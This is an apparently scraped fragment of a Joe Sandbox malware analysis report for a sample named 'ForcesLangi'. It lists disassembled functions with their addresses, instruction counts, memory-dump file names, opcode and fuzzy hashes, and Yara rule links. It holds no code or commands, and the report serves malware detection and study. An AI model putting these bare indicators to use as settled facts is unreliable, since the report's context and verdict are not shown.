                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b189d9cb31b5cc0f4f8160ffac9b20985c571f5cb3f1f2536ed52ddef9e0adfc
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F321776A456818FDF088E7CC4E57CE7BF2AB47328F349119D415DBBD4C62E840A8B94
                                                                                                                                                                                                                                              Function 6CE269C0 Relevance: .5, Instructions: 535COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 525f921a18186e9858d89e9028e5ef03cf37f0542b37d38c1b9fe0859522cc15
                                                                                                                                                                                                                                              • Instruction ID: 03aa7c49da25071a56b83f6797ebc6741c5509f7d6144e7bb197cf37d642a3a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 525f921a18186e9858d89e9028e5ef03cf37f0542b37d38c1b9fe0859522cc15
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1A022176A445018FCF08CEBCC5E57DE7BF2EB4B314F209619D812EB794C62E890A8B55
                                                                                                                                                                                                                                              Function 6CE1C970 Relevance: .5, Instructions: 534COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: d46d4cd79c2ffee240b50334b50644000c26d2d239a81097c6215b3c295c02e9
                                                                                                                                                                                                                                              • Instruction ID: ba1bc647d913c729489f2cd1868b3e7d88b2e05ab5abec9be9ff34d1cfbfa6aa
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d46d4cd79c2ffee240b50334b50644000c26d2d239a81097c6215b3c295c02e9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3602F07AB092448FCF05CEBCC5917CD7BF2AB8B358F345525D411EBB94C23A990A8B41
                                                                                                                                                                                                                                              Function 6CE15E30 Relevance: .5, Instructions: 520COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f547f959b27c06655039c8a8ad0f327dd81c56d799695076bc5474da9712d268
                                                                                                                                                                                                                                              • Instruction ID: e8e71ce0fe27bc53756ed9cc8a0dda4d59cd3e678647c34def572c91f430bb10
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f547f959b27c06655039c8a8ad0f327dd81c56d799695076bc5474da9712d268
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA02FF76B0A5418FCF08CE6CD6953CD7BF6EB4B324F305525E415EBB95C22A8E0A8B50
                                                                                                                                                                                                                                              Function 6CE27F20 Relevance: .5, Instructions: 475COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4d05f3161547d0f86dacd05d5480c4bba9fad306636e1469172cf2237754acc0
                                                                                                                                                                                                                                              • Instruction ID: 50cffe49788e9a9ed816ab7ac3ebe3081d7b32b313cf3adbe3f3b87cf2cd96d4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d05f3161547d0f86dacd05d5480c4bba9fad306636e1469172cf2237754acc0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76F1F137A81A118FDF08CE7CD5957DE77F2AB47328F20511AD910EBB94C22E8D0A8B50
                                                                                                                                                                                                                                              Function 6CE1D5F0 Relevance: .4, Instructions: 443COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2ca32240d799d11d9d8668690454f754892f44a526ea712ae968dfda176443e4
                                                                                                                                                                                                                                              • Instruction ID: 82f28cadf31a8fd1a89308f227c8c57e15d40f62e835685d291959833d6bbaac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ca32240d799d11d9d8668690454f754892f44a526ea712ae968dfda176443e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85E1167AB456058FCF05CE7CC5957DE7BF2AB47324F209619D821EBB94C2268A0ACF11
                                                                                                                                                                                                                                              Function 6CE23720 Relevance: .4, Instructions: 386COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bf3df671fdede12d5da4f913285b72e627b536e34854eb0e22eeb32a1b6ec5d2
                                                                                                                                                                                                                                              • Instruction ID: fe31ebb6dca9fdeb51bd7ea82bb6aa60a823dd2012831381e1ee44455045ec51
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3df671fdede12d5da4f913285b72e627b536e34854eb0e22eeb32a1b6ec5d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72C11576A446158FCF088E7CC4953CE7BF6EB5B324F245219D511EBB90C62E890A8F64
                                                                                                                                                                                                                                              Function 6CE1D0C0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 678e044bdef20015465c5ad5ee2fa5126ffe7e5fbea27a7f00757d36f34d7f34
                                                                                                                                                                                                                                              • Instruction ID: 51075d25316e3ea6fb176b0ed60f37c60b1a0e624ae12ec5f02a9bc68a72319e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 678e044bdef20015465c5ad5ee2fa5126ffe7e5fbea27a7f00757d36f34d7f34
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56D1087AB196058FCF05CE7CD9957DE77F2AB4B328F244119D421E7B84C22A8A1ACB11
                                                                                                                                                                                                                                              Function 6CE0EDF0 Relevance: .4, Instructions: 358COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa11d7d5566121d0a8349ada1fb2a4d392515e9d32fc75f73b8df7946fddc92c
                                                                                                                                                                                                                                              • Instruction ID: a1b77a159739929ffbde9a587f7b4dcee920c15210c51dc364d275f985fea528
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa11d7d5566121d0a8349ada1fb2a4d392515e9d32fc75f73b8df7946fddc92c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEC12536B446068FCB04CEBCC1957EE7BF2AB47354F20952AD411EB7D0D62A891B8BC5
                                                                                                                                                                                                                                              Function 6CE15210 Relevance: .3, Instructions: 314COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 5babf6e07308c742723f185b17711850184bda3c9c99173beabf698a9499d997
                                                                                                                                                                                                                                              • Instruction ID: bc3c655670133d14c2d192e3e87bc62a8d653854d926b53e165715e04914d77d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5babf6e07308c742723f185b17711850184bda3c9c99173beabf698a9499d997
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ACA1037664A6468FCF048A7CC5D53DE3BF3AB43359F20551AD421DBF95C22A890ACB81
                                                                                                                                                                                                                                              Function 6CE03E30 Relevance: .3, Instructions: 307COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f1f42142c507790bfb44b89c474fb0a5587983af8f2efc191e76be57ecf42433
                                                                                                                                                                                                                                              • Instruction ID: a75fcdeffbeab99b1c470ec13e565eeb7b50cf8b005ff6f32b24353c35fecd17
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1f42142c507790bfb44b89c474fb0a5587983af8f2efc191e76be57ecf42433
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFA13732B411008FDF04CEBCCA957CD7BF3AB57325F21521AD524EB795D23A890A8B94
                                                                                                                                                                                                                                              Function 6CE16540 Relevance: .3, Instructions: 304COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: fd4bab7ecbdb7f707d0ad8684bc59aa3f4ae6ec1f5f5f3c5f1eeee5b23fa8aa3
                                                                                                                                                                                                                                              • Instruction ID: cfd3d6cb563d76ae1615bb7fc27d015fa2107a622b435823f65e7b52e58c823a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: fd4bab7ecbdb7f707d0ad8684bc59aa3f4ae6ec1f5f5f3c5f1eeee5b23fa8aa3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3AB1ADB6A09205CFDB04CFACC5917DDBBF9EB4B318F218019D419EBB50C2399946CBA5
                                                                                                                                                                                                                                              Function 6CE12060 Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 928effe19d62be9a4cc97c165661ff9cd1213b277e54f5083346817bc621bbef
                                                                                                                                                                                                                                              • Instruction ID: 8d53507150d6602266dd7899f72604f082dae26eeb4f3a246822cadcf4ec6cd3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 928effe19d62be9a4cc97c165661ff9cd1213b277e54f5083346817bc621bbef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B91E376B481468FCF08CE7CCC993EE7BB2AB57354F204519C910DBF94C13A495A8B95
                                                                                                                                                                                                                                              Function 6CDF7370 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 16302f38e09a37c5e933c53b762502eddf4346ae6c62da972589b7e328435d49
                                                                                                                                                                                                                                              • Instruction ID: c238d2e5520f5b5f91a5cc9bc8d5007e255d290fc890fd24c36c94c7be668871
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 16302f38e09a37c5e933c53b762502eddf4346ae6c62da972589b7e328435d49
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0813575241A019FDB148F3CC4E47C77BE2AF57324F23990DD8F68BBA5C626940A8B90
                                                                                                                                                                                                                                              Function 6CE12D80 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1e3952198bf7c7bf7f37711ededdfe9d30fd1282ad5a11abeefe8bc3adf2fb0a
                                                                                                                                                                                                                                              • Instruction ID: 63d1d54cc39fa89d79f74b33bc44a3560259b1436c7330456261b1796f91c46c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e3952198bf7c7bf7f37711ededdfe9d30fd1282ad5a11abeefe8bc3adf2fb0a
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A712736B095068FCF08CA7CC9893EE7BF2A743358F309515D825DBF94D52A8A1ACB41
                                                                                                                                                                                                                                              Function 6CE20D10 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 220dbcb291e0c628092f602218a238b39f20d576d94f6268cf03845c38467001
                                                                                                                                                                                                                                              • Instruction ID: d81289c1cc2978f4361086577e59006ecd69946aa757293a99e2a67b080ac4d0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 220dbcb291e0c628092f602218a238b39f20d576d94f6268cf03845c38467001
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F511536A866458FDF04CD7CC6A53EF77F29B43328F309615982597BD4C12E590A8F90
                                                                                                                                                                                                                                              Function 6CE32D21 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                              • Instruction ID: 9ecac5bbc39ca4e45c1dde58d882cac89a1ebc9b005d3dc8d723831499b287ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE08C32912278EBCB11CB88C944A8AB7FCEB44B04B6140AAB555D3611C670EE00C7D0
                                                                                                                                                                                                                                              Function 6CE35400 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
